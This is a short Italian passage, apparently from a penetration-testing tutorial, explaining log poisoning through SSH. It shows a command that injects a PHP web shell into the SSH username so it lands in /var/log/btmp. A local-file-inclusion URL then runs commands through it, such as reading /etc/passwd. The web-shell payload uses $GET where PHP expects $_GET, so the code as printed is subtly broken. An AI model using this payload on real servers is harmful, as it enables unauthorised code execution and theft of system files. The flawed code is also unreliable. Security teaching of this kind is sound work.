Un lavoro simile a quello fatto per il servizio http lo si può replicare con SSH tramite una richiesta ssh dove al posto del nome utente immettiamo del codice come per esempio una cmd, anche in questo caso dobbiamo avere il permesso di lettura del file /var/log/btmp nel quale apparirà il nostro output di comando (in caso venisse eseguito), per far ciò possiamo iniettare codice php come nel seguente esempio:
ssh '<?php system($GET["cmd"]); ?>'@INDIRIZZO_VITTIMAQuesto ci permetterà di eseguire codice arbitrario come per esempio lettura del file /etc/passwd come nel seguente esempio:
http://INDIRZZO_IP/index.php?filename=/var/log/btmp&cmd=cat /etc/passwd
Per capire meglio il concetto di Log Poisoning puoi andare alla pagina Log Poisoning http.